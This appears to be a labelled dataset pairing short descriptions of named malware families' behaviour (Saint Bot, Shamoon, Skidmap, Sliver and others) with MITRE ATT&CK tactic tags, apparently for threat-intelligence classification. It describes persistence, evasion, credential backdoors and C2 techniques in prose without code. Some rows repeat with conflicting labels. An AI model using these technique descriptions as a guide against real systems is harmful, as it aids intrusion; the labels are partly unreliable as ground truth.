Saint Bot has used PowerShell for execution.,['TA0002:Execution']
Saint Bot has enumerated running processes on a compromised host to determine if it is running under the process name `dfrgui.exe`.,['TA0007:Discovery']
The Saint Bot loader has used API calls to spawn `MSBuild.exe` in a suspended state before injecting the decrypted Saint Bot binary into it.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Saint Bot has used `check_registry_keys` as part of its environmental checks.,['TA0007:Discovery']
Saint Bot has established persistence by being copied to the Startup directory or through the `\Software\Microsoft\Windows\CurrentVersion\Run` registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Saint Bot has used `regsvr32` to execute scripts.,['TA0005:Defense Evasion']
"Saint Bot has created a scheduled task named ""Maintenance"" to establish persistence.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Saint Bot has been packed using a dark market crypter.,['TA0005:Defense Evasion']
Saint Bot has been distributed as malicious attachments within spearphishing emails.,['TA0001:Initial Access']
Saint Bot has been distributed through malicious links contained within spearphishing emails.,['TA0001:Initial Access']
Saint Bot has used Base64 to encode its C2 communications.,['TA0011:Command and Control']
"Saint Bot has run several virtual machine and sandbox checks, including checking if `Sbiedll.dll` is present in a list of loaded modules, comparing the machine name to `HAL9TH` and the user name to `JohnDoe`, and checking the BIOS version for known virtual machine identifiers.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Saint Bot can identify the OS version, CPU, and other details from a victim's machine.",['TA0007:Discovery']
"Saint Bot has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova.",['TA0007:Discovery']
Saint Bot can collect the IP address of a victim machine.,['TA0007:Discovery']
Saint Bot can collect the username from a compromised host.,['TA0007:Discovery']
Saint Bot has used the command `timeout 20` to pause the execution of its initial loader.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Saint Bot has used `.vbs` scripts for execution.,['TA0002:Execution']
Saint Bot has used HTTP for C2 communications.,['TA0011:Command and Control']
Saint Bot has used `cmd.exe` and `.bat` scripts for execution.,['TA0002:Execution']
Sakula contains UAC bypass code for both 32- and 64-bit systems.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Sakula uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Sakula uses single-byte XOR obfuscation to obfuscate many of its files.,['TA0005:Defense Evasion']
Some Sakula samples use cmd.exe to delete temporary files.,['TA0005:Defense Evasion']
Sakula has the capability to download files.,['TA0011:Command and Control']
"Most Sakula samples maintain persistence by setting the Registry Run key SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ in the HKLM or HKCU hive, with the Registry value and file name varying by sample.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Sakula calls cmd.exe to run various DLL files via rundll32.,['TA0005:Defense Evasion']
Sakula encodes C2 traffic with single-byte XOR keys.,['TA0011:Command and Control']
Sakula uses HTTP for C2.,['TA0011:Command and Control']
Sakula calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. Sakula also has the capability to invoke a reverse shell.,['TA0002:Execution']
Some Sakula samples install themselves as services for persistence by calling WinExec with the net start argument.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SamSam has used garbage code to pad some of its malware components.,['TA0005:Defense Evasion']
SamSam encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files.,['TA0040:Impact']
SamSam has been seen using AES or DES to encrypt payloads and payload components.,['TA0005:Defense Evasion']
SamSam has been seen deleting its own files and payloads to make analysis of the attack more difficult.,['TA0005:Defense Evasion']
SamSam uses custom batch scripts to execute some of its components.,['TA0002:Execution']
Samurai can compile and execute downloaded modules at runtime.,['TA0005:Defense Evasion']
Samurai can leverage an exfiltration module to download arbitrary files from compromised machines.,['TA0009:Collection']
Samurai can encrypt API name strings with an XOR-based algorithm.,['TA0005:Defense Evasion']
Samurai can use a specific module for file enumeration.,['TA0007:Discovery']
Samurai has been used to deploy other malware including Ninja.,['TA0011:Command and Control']
Samurai has created the directory `%COMMONPROGRAMFILES%\Microsoft Shared\wmi\` to contain DLLs for loading successive stages.,['TA0005:Defense Evasion']
The Samurai loader component can create multiple Registry keys to force the svchost.exe process to load the final backdoor.,['TA0005:Defense Evasion']
Samurai has the ability to call Windows APIs.,['TA0002:Execution']
Samurai can use a proxy module to forward TCP packets to external hosts.,['TA0011:Command and Control']
"Samurai can encrypt the names of requested APIs and deliver its final payload as a compressed, encrypted and base64 encoded blob.",['TA0005:Defense Evasion']
Samurai has the ability to proxy connections to specified remote IPs and ports through a a proxy module.,['TA0011:Command and Control']
Samurai can query `SOFTWARE\Microsoft\.NETFramework\policy\v2.0` for discovery.,['TA0007:Discovery']
Samurai can check for the presence and version of the .NET framework.,['TA0007:Discovery']
Samurai can base64 encode data sent in C2 communications prior to its encryption.,['TA0011:Command and Control']
Samurai can encrypt C2 communications with AES.,['TA0011:Command and Control']
Samurai can use a .NET HTTPListener class to receive and handle HTTP POST requests.,['TA0011:Command and Control']
Samurai can use a remote command module for execution via the Windows command line.,['TA0002:Execution']
Samurai can create a service at `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost` to trigger execution and maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Sardonic has the ability to send a random 64-byte RC4 key to communicate with actor-controlled C2 servers by using an RSA public key.,['TA0011:Command and Control']
Sardonic can use the `QueueUserAPC` API to execute shellcode on a compromised machine.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Sardonic PowerShell scripts can be encrypted with RC4 and compressed using Gzip.,['TA0005:Defense Evasion']
Sardonic has the ability to collect data from a compromised machine to deliver to the attacker.,['TA0009:Collection']
Sardonic can first decrypt with the RC4 algorithm using a hardcoded decryption key before decompressing.,['TA0005:Defense Evasion']
Sardonic has the ability to delete created WMI objects to evade detections.,['TA0005:Defense Evasion']
Sardonic has the ability to upload additional malicious files to a compromised machine.,['TA0011:Command and Control']
Sardonic has the ability to call Win32 API functions to determine if `powershell.exe` is running.,['TA0002:Execution']
Sardonic has the ability to execute the `net view` command.,['TA0007:Discovery']
Sardonic can communicate with actor-controlled C2 servers by using a custom little-endian binary protocol.,['TA0011:Command and Control']
Sardonic has the ability to connect with actor-controlled C2 servers using a custom binary protocol over port 443.,['TA0011:Command and Control']
Sardonic can use certain ConfuserEx features for obfuscation and can be encoded in a base64 string.,['TA0005:Defense Evasion']
Sardonic has the ability to execute PowerShell commands on a compromised machine.,['TA0002:Execution']
Sardonic has the ability to execute the `tasklist` command.,['TA0007:Discovery']
Sardonic has a plugin system that can load specially made DLLs into memory and execute their functions.,['TA0005:Defense Evasion']
Sardonic can encode client ID data in 32 uppercase hex characters and transfer to the actor-controlled C2 server.,['TA0011:Command and Control']
Sardonic has the ability to use an RC4 key to encrypt communications to and from actor-controlled C2 servers.,['TA0011:Command and Control']
"Sardonic has the ability to collect the computer name, CPU manufacturer name, and C:\ drive serial number from a compromised machine. Sardonic also has the ability to execute the `ver` and `systeminfo` commands.",['TA0007:Discovery']
Sardonic has the ability to execute the `ipconfig` command.,['TA0007:Discovery']
Sardonic has the ability to execute the `netstat` command.,['TA0007:Discovery']
Sardonic has the ability to execute the `net start` command.,['TA0007:Discovery']
Sardonic has the ability to run `cmd.exe` or other interactive processes on a compromised computer.,['TA0002:Execution']
Sardonic can use WMI to execute PowerShell commands on a compromised machine.,['TA0002:Execution']
Sardonic can use a WMI event filter to invoke a command-line event consumer to gain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SeaDuke compressed data with zlib prior to sending it over C2.,['TA0009:Collection']
"SeaDuke can securely delete files, including deleting itself from the victim.",['TA0005:Defense Evasion']
SeaDuke is capable of uploading and downloading files.,['TA0011:Command and Control']
Some SeaDuke samples have a module to use pass the ticket with Kerberos for authentication.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
SeaDuke uses a module to execute Mimikatz with PowerShell to perform Pass the Ticket.,['TA0002:Execution']
SeaDuke is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials.,['TA0009:Collection']
SeaDuke is capable of persisting via a .lnk file stored in the Startup directory.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SeaDuke has been packed with the UPX packer.,['TA0005:Defense Evasion']
SeaDuke C2 traffic is base64-encoded.,['TA0011:Command and Control']
SeaDuke C2 traffic has been encrypted with RC4 and AES.,['TA0011:Command and Control']
Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
SeaDuke uses HTTP and HTTPS for C2.,['TA0011:Command and Control']
SeaDuke is capable of executing commands.,['TA0002:Execution']
SeaDuke uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Seasalt obfuscates configuration data.,['TA0005:Defense Evasion']
Seasalt has a command to delete a specified file.,['TA0005:Defense Evasion']
Seasalt has the capability to identify the drive type on a victim.,['TA0007:Discovery']
Seasalt has a command to download additional files.,['TA0011:Command and Control']
"Seasalt has masqueraded as a service called ""SaSaut"" with a display name of ""System Authorization Service"" in an apparent attempt to masquerade as a legitimate service.",['TA0005:Defense Evasion']
Seasalt has a command to perform a process listing.,['TA0007:Discovery']
Seasalt creates a Registry entry to ensure infection after reboot under HKLM\Software\Microsoft\Windows\currentVersion\Run.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Seasalt uses HTTP for C2 communications.,['TA0011:Command and Control']
Seasalt uses cmd.exe to create a reverse shell on the infected endpoint.,['TA0002:Execution']
Seasalt is capable of installing itself as a service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"ServHelper has added a user named ""supportaccount"" to the Remote Desktop Users and Administrators groups.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"ServHelper may set up a reverse SSH tunnel to give the attacker access to services running on the victim, such as RDP.",['TA0011:Command and Control']
ServHelper has a module to delete itself from the infected machine.,['TA0005:Defense Evasion']
ServHelper may download additional files to execute.,['TA0011:Command and Control']
"ServHelper has created a new user named ""supportaccount"".",['TA0003:Persistence']
ServHelper has created a new user named `supportaccount`.,['TA0005:Defense Evasion']
ServHelper has the ability to execute a PowerShell script to get information from the infected host.,['TA0002:Execution']
ServHelper may attempt to establish persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ServHelper has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.,['TA0008:Lateral Movement']
ServHelper contains a module for downloading and executing DLLs that leverages rundll32.exe.,['TA0005:Defense Evasion']
ServHelper contains modules that will use schtasks to carry out malicious operations.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
ServHelper will attempt to enumerate Windows version and system architecture.,['TA0007:Discovery']
ServHelper will attempt to enumerate the username of the victim.,['TA0007:Discovery']
ServHelper uses HTTP for C2.,['TA0011:Command and Control']
ServHelper can execute shell commands against cmd.,['TA0002:Execution']
"Seth-Locker can encrypt files on a targeted system, appending them with the suffix .seth.",['TA0040:Impact']
Seth-Locker has the ability to download and execute files on a compromised host.,['TA0011:Command and Control']
Seth-Locker can execute commands via the command line shell.,['TA0002:Execution']
ShadowPad has used DNS tunneling for C2 communications.,['TA0011:Command and Control']
ShadowPad has decrypted a binary blob to start execution.,['TA0005:Defense Evasion']
ShadowPad uses a DGA that is based on the day of the month for C2 servers.,['TA0011:Command and Control']
ShadowPad has injected a DLL into svchost.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ShadowPad has used FTP for C2 communications.,['TA0011:Command and Control']
ShadowPad maintains a configuration block and virtual file system in the Registry.,['TA0005:Defense Evasion']
ShadowPad has deleted arbitrary Registry values.,['TA0005:Defense Evasion']
ShadowPad has downloaded code from a C2 server.,['TA0011:Command and Control']
ShadowPad can modify the Registry to store and maintain a configuration block and virtual file system.,['TA0005:Defense Evasion']
ShadowPad has used UDP for C2 communications.,['TA0011:Command and Control']
ShadowPad has encoded data as readable Latin characters.,['TA0011:Command and Control']
"ShadowPad has encrypted its payload, a virtual file system, and various files.",['TA0005:Defense Evasion']
ShadowPad has collected the PID of a malicious process.,['TA0007:Discovery']
ShadowPad has injected an install module into a newly created process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ShadowPad has sent data back to C2 every 8 hours.,['TA0010:Exfiltration']
"ShadowPad has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers.",['TA0007:Discovery']
ShadowPad has collected the domain name of the victim system.,['TA0007:Discovery']
ShadowPad has collected the username of the victim system.,['TA0007:Discovery']
ShadowPad has collected the current date and time of the victim system.,['TA0007:Discovery']
ShadowPad communicates over HTTP to retrieve a string that is decoded into a C2 server URL.,['TA0011:Command and Control']
Shamoon attempts to disable UAC remote restrictions by modifying the Registry.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Shamoon attempts to overwrite operating system files and disk structures with image files. In a later variant, randomly generated data was used for data overwrites.",['TA0040:Impact']
Shamoon has an operational mode for encrypting data instead of overwriting it.,['TA0040:Impact']
Shamoon decrypts ciphertext using an XOR cipher and a base64-encoded string.,['TA0005:Defense Evasion']
Shamoon has been seen overwriting features of disk structure such as the MBR.,['TA0040:Impact']
"If Shamoon cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Shamoon can download an executable to run on the victim.,['TA0011:Command and Control']
Shamoon attempts to copy itself to remote machines on the network.,['TA0008:Lateral Movement']
"Shamoon creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.” Newer versions create the ""MaintenaceSrv"" service, which misspells the word ""maintenance.""",['TA0005:Defense Evasion']
"Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1.",['TA0005:Defense Evasion']
Shamoon contains base64-encoded strings.,['TA0005:Defense Evasion']
Shamoon queries several Registry keys to identify hard disk partitions to overwrite.,['TA0007:Discovery']
Shamoon scans the C-class subnet of the IPs on the victim's interfaces.,['TA0007:Discovery']
"Shamoon accesses network share, enables share access to the target device, copies an executable payload to the target system, and uses a Scheduled Task/Job to execute the malware.",['TA0008:Lateral Movement']
Shamoon copies an executable payload to the target system by using SMB/Windows Admin Shares and then scheduling an unnamed task to execute the malware.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Shamoon creates a new service named “ntssrv” to execute the payload. Shamoon can also spread via PsExec.,['TA0002:Execution']
Shamoon obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.,['TA0007:Discovery']
Shamoon obtains the target's IP address and local network segment.,['TA0007:Discovery']
Shamoon will reboot the infected system once the wiping functionality has been completed.,['TA0040:Impact']
Shamoon obtains the system time and will only activate if it is greater than a preset date.,['TA0007:Discovery']
Shamoon can change the modified time for files to evade forensic detection.,['TA0005:Defense Evasion']
"Shamoon can impersonate tokens using LogonUser, ImpersonateLoggedOnUser, and ImpersonateNamedPipeClient.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Shamoon has used HTTP for C2.,['TA0011:Command and Control']
"Shamoon creates a new service named “ntssrv” to execute the payload. Newer versions create the ""MaintenaceSrv"" and ""hdv_725x"" services.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Shark can use DNS in C2 communications.,['TA0011:Command and Control']
Shark has stored information in folders named `U1` and `U2` prior to exfiltration.,['TA0009:Collection']
Shark can upload files to its C2.,['TA0009:Collection']
Shark can extract and decrypt downloaded .zip files.,['TA0005:Defense Evasion']
Shark can send DNS C2 communications using a unique domain generation algorithm.,['TA0011:Command and Control']
Shark can use encrypted and encoded files for C2 configuration.,['TA0005:Defense Evasion']
Shark has the ability to upload files from the compromised host over a DNS or HTTP C2 channel.,['TA0010:Exfiltration']
Shark can update its configuration to use a different C2 server.,['TA0011:Command and Control']
Shark can delete files downloaded to the compromised host.,['TA0005:Defense Evasion']
Shark can download additional files from its C2 via HTTP or DNS.,['TA0011:Command and Control']
Shark binaries have been named `audioddg.pdb` and `Winlangdb.pdb` in order to appear legitimate.,['TA0005:Defense Evasion']
Shark can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID.,['TA0007:Discovery']
Shark can pause C2 communications for a specified time.,['TA0010:Exfiltration']
Shark can stop execution if the screen width of the targeted machine is not over 600 pixels.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Shark can collect the GUID of a targeted machine.,['TA0007:Discovery']
Shark has the ability to use HTTP in C2 communications.,['TA0011:Command and Control']
Shark has the ability to use `CMD` to execute commands.,['TA0002:Execution']
SharpDisco has dropped a recent-files stealer plugin to `C:\Users\Public\WinSrcNT\It11.exe`.,['TA0009:Collection']
SharpDisco can load a plugin to exfiltrate stolen files to SMB shares also used in C2.,['TA0010:Exfiltration']
SharpDisco has the ability to transfer data between SMB shares.,['TA0011:Command and Control']
SharpDisco can identify recently opened files by using an LNK format parser to extract the original file path from LNK files found in either `%USERPROFILE%\Recent` or `%APPDATA%\Microsoft\Windows\Recent` .,['TA0007:Discovery']
SharpDisco can hide windows using `ProcessWindowStyle.Hidden`.,['TA0005:Defense Evasion']
SharpDisco has been used to download a Python interpreter to `C:\Users\Public\WinTN\WinTN.exe` as well as other plugins from external sources.,['TA0011:Command and Control']
SharpDisco can leverage Native APIs through plugins including `GetLogicalDrives`.,['TA0002:Execution']
SharpDisco has dropped a plugin to monitor external drives to `C:\Users\Public\It3.exe`.,['TA0007:Discovery']
SharpDisco can create scheduled tasks to execute reverse shells that read and write data to and from specified SMB shares.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
SharpDisco can use a plugin to enumerate system drives.,['TA0007:Discovery']
SharpDisco can use `cmd.exe` to execute plugins and to send command output to specified SMB shares.,['TA0002:Execution']
SharpStage has decompressed data received from the C2 server.,['TA0005:Defense Evasion']
SharpStage has the ability to download and execute additional payloads via a DropBox API.,['TA0011:Command and Control']
SharpStage can execute arbitrary commands with PowerShell.,['TA0002:Execution']
SharpStage has the ability to create persistence for the malware using the Registry autorun key and startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SharpStage has a persistence component to write a scheduled task for the payload.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
SharpStage has the ability to capture the victim's screen.,['TA0009:Collection']
SharpStage has checked the system settings to see if Arabic is the configured language.,['TA0007:Discovery']
SharpStage has been used to target Arabic-speaking users and used code that checks if the compromised machine has the Arabic language installed.,['TA0007:Discovery']
SharpStage has used a legitimate web service for evading detection.,['TA0011:Command and Control']
SharpStage can execute arbitrary commands with the command line.,['TA0002:Execution']
SharpStage can use WMI for execution.,['TA0002:Execution']
ShimRat has installed shim databases in the AppPatch folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ShimRat has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ShimRat has the capability to upload collected files to a C2.,['TA0009:Collection']
ShimRat has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.,['TA0005:Defense Evasion']
ShimRat can use pre-configured HTTP proxies.,['TA0011:Command and Control']
ShimRat has used a secondary C2 location if the first was unavailable.,['TA0011:Command and Control']
"ShimRat can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files.",['TA0005:Defense Evasion']
ShimRat can list directories.,['TA0007:Discovery']
ShimRat can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
ShimRat can download additional files.,['TA0011:Command and Control']
ShimRat can impersonate Windows services and antivirus products to avoid detection on compromised systems.,['TA0005:Defense Evasion']
ShimRat has registered two registry keys for shim databases.,['TA0005:Defense Evasion']
ShimRat has used Windows API functions to install the service and shim.,['TA0002:Execution']
ShimRat can enumerate connected drives for infected host machines.,['TA0007:Discovery']
ShimRat has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.,['TA0005:Defense Evasion']
ShimRat has installed a registry based start-up key HKCU\Software\microsoft\windows\CurrentVersion\Run to maintain persistence should other methods fail.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ShimRat can sleep when instructed to do so by the C2.,['TA0010:Exfiltration']
ShimRat's loader has been packed with the compressed ShimRat core DLL and the legitimate DLL for it to hijack.,['TA0005:Defense Evasion']
ShimRat communicated over HTTP and HTTPS with C2 servers.,['TA0011:Command and Control']
ShimRat can be issued a command shell function from the C2.,['TA0002:Execution']
ShimRat has installed a Windows service to maintain persistence on victim machines.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ShimRatReporter listed all non-privileged and privileged accounts available on the machine.,['TA0007:Discovery']
ShimRatReporter used LZ compression to compress initial reconnaissance reports before sending to the C2.,['TA0009:Collection']
"ShimRatReporter gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.",['TA0009:Collection']
ShimRatReporter sent collected system and network information compiled into a report to an adversary-controlled C2.,['TA0010:Exfiltration']
ShimRatReporter sent generated reports to the C2 via HTTP POST requests.,['TA0010:Exfiltration']
ShimRatReporter had the ability to download additional payloads.,['TA0011:Command and Control']
"ShimRatReporter spoofed itself as AlphaZawgyl_font.exe, a specialized Unicode font.",['TA0005:Defense Evasion']
ShimRatReporter used several Windows API functions to gather information from the infected system.,['TA0002:Execution']
ShimRatReporter encrypted gathered information with a combination of shifting and XOR using a static key.,['TA0005:Defense Evasion']
ShimRatReporter gathered the local privileges for the infected host.,['TA0007:Discovery']
ShimRatReporter listed all running processes on the machine.,['TA0007:Discovery']
ShimRatReporter gathered a list of installed software on the infected host.,['TA0007:Discovery']
ShimRatReporter gathered the operating system name and specific Windows version of an infected machine.,['TA0007:Discovery']
"ShimRatReporter gathered the local proxy, domain, IP, routing tables, mac address, gateway, DNS servers, and DHCP status information from an infected host.",['TA0007:Discovery']
ShimRatReporter used the Windows function GetExtendedUdpTable to detect connected UDP endpoints.,['TA0007:Discovery']
ShimRatReporter communicated over HTTP with preconfigured C2 servers.,['TA0011:Command and Control']
Sibot has obfuscated scripts used in execution.,['TA0005:Defense Evasion']
Sibot can decrypt data received from a C2 and save to a file.,['TA0005:Defense Evasion']
Sibot will delete itself if a certain server response is received.,['TA0005:Defense Evasion']
Sibot has installed a second-stage script in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot registry key.,['TA0005:Defense Evasion']
Sibot will delete an associated registry key if a certain server response is received.,['TA0005:Defense Evasion']
Sibot can download and execute a payload onto a compromised system.,['TA0011:Command and Control']
Sibot has downloaded a DLL to the C:\windows\system32\drivers\ folder and renamed it with a .sys extension.,['TA0005:Defense Evasion']
Sibot has modified the Registry to install a second-stage script in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot.,['TA0005:Defense Evasion']
Sibot has been executed via MSHTA application.,['TA0005:Defense Evasion']
Sibot has queried the registry for proxy server information.,['TA0007:Discovery']
Sibot has executed downloaded DLLs with rundll32.exe.,['TA0005:Defense Evasion']
Sibot has been executed via a scheduled task.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Sibot checked if the compromised system is configured to use proxies.,['TA0007:Discovery']
Sibot has retrieved a GUID associated with a present LAN connection on a compromised machine.,['TA0007:Discovery']
Sibot executes commands using VBScript.,['TA0002:Execution']
Sibot communicated with its C2 server via HTTP GET requests.,['TA0011:Command and Control']
Sibot has used a legitimate compromised website to download DLLs to the victim's machine.,['TA0011:Command and Control']
Sibot has used WMI to discover network connections and configurations. Sibot has also used the Win32_Process class to execute a malicious DLL.,['TA0002:Execution']
SideTwist can embed C2 responses in the source code of a fake Flickr webpage.,['TA0011:Command and Control']
SideTwist has the ability to upload files from a compromised host.,['TA0009:Collection']
SideTwist can decode and decrypt messages received from C2.,['TA0005:Defense Evasion']
SideTwist has exfiltrated data over its C2 channel.,['TA0010:Exfiltration']
SideTwist has primarily used port 443 for C2 but can use port 80 as a fallback.,['TA0011:Command and Control']
SideTwist has the ability to search for specific files.,['TA0007:Discovery']
SideTwist has the ability to download additional files.,['TA0011:Command and Control']
"SideTwist can use GetUserNameW, GetComputerNameW, and GetComputerNameExW to gather information.",['TA0002:Execution']
SideTwist has used Base64 for encoded C2 traffic.,['TA0011:Command and Control']
SideTwist can encrypt C2 communications with a randomly generated key.,['TA0011:Command and Control']
SideTwist can collect the computer name of a targeted system.,['TA0007:Discovery']
SideTwist has the ability to collect the domain name on a compromised host.,['TA0007:Discovery']
SideTwist can collect the username on a targeted system.,['TA0007:Discovery']
SideTwist has used HTTP GET and POST requests over port 443 for C2.,['TA0011:Command and Control']
SideTwist can execute shell commands on a compromised host.,['TA0002:Execution']
Siloscape connects to an IRC server for C2.,['TA0011:Command and Control']
Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.,['TA0002:Execution']
Siloscape has decrypted the password of the C2 server with a simple byte by byte XOR. Siloscape also writes both an archive of Tor and the unzip binary to disk from data embedded within the payload using Visual Studio’s Resource Manager.,['TA0005:Defense Evasion']
Siloscape maps the host’s C drive to the container by creating a global symbolic link to the host through the calling of NtSetInformationSymbolicLink.,['TA0004:Privilege Escalation']
Siloscape is executed after the attacker gains initial access to a Windows container using a known vulnerability.,['TA0001:Initial Access']
Siloscape has leveraged a vulnerability in Windows containers to perform an Escape to Host.,['TA0004:Privilege Escalation']
Siloscape searches for the Kubernetes config file and other related files using a regular expression.,['TA0007:Discovery']
Siloscape uses Tor to communicate with C2.,['TA0011:Command and Control']
Siloscape makes various native API calls.,['TA0002:Execution']
Siloscape itself is obfuscated and uses obfuscated API calls.,['TA0005:Defense Evasion']
Siloscape checks for Kubernetes node permissions.,['TA0007:Discovery']
Siloscape searches for the kubectl binary.,['TA0007:Discovery']
Siloscape impersonates the main thread of CExecSvc.exe by calling NtImpersonateThread.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Siloscape can run cmd through an IRC channel.,['TA0002:Execution']
Skeleton Key is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Skidmap is a kernel-mode rootkit used for cryptocurrency mining.,['TA0040:Impact']
Skidmap has installed itself via crontab.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Skidmap has the ability to download, unpack, and decrypt tar.gz files .",['TA0005:Defense Evasion']
Skidmap has the ability to set SELinux to permissive mode.,['TA0005:Defense Evasion']
Skidmap has encrypted it's main payload using 3DES.,['TA0005:Defense Evasion']
Skidmap has checked for the existence of specific files including /usr/sbin/setenforce and /etc/selinux/config. It also has the ability to monitor the cryptocurrency miner file and process.,['TA0007:Discovery']
Skidmap has the ability to download files on an infected host.,['TA0011:Command and Control']
Skidmap has the ability to install several loadable kernel modules on infected machines.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Skidmap has created a fake rm binary to replace the legitimate Linux binary.,['TA0005:Defense Evasion']
Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Skidmap has monitored critical processes to ensure resiliency.,['TA0007:Discovery']
Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.,['TA0005:Defense Evasion']
Skidmap has the ability to add the public key of its handlers to the authorized_keys file to maintain persistence on an infected host.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Skidmap has the ability to check if /usr/sbin/setenforce exists. This file controls what mode SELinux is in.,['TA0007:Discovery']
Skidmap has the ability to check whether the infected system’s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use.,['TA0007:Discovery']
Skidmap has used pm.sh to download and install its main payload.,['TA0002:Execution']
Sliver has the ability to manipulate user tokens on targeted Windows systems.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Sliver can use mutual TLS and RSA cryptography to exchange a session key.,['TA0011:Command and Control']
Sliver can support C2 communications over DNS.,['TA0011:Command and Control']
Sliver can encrypt strings at compile time.,['TA0005:Defense Evasion']
Sliver can exfiltrate files from the victim using the download command.,['TA0010:Exfiltration']
Sliver can enumerate files on a target system.,['TA0007:Discovery']
Sliver can upload files from the C2 server to the victim machine using the upload command.,['TA0011:Command and Control']
Sliver can inject code into local and remote processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Sliver can take screenshots of the victim’s active display.,['TA0009:Collection']
Sliver can use standard encoding techniques like gzip and hex to ASCII to encode the C2 communication payload.,['TA0011:Command and Control']
Sliver can encode binary data into a .PNG file for C2 communication.,['TA0011:Command and Control']
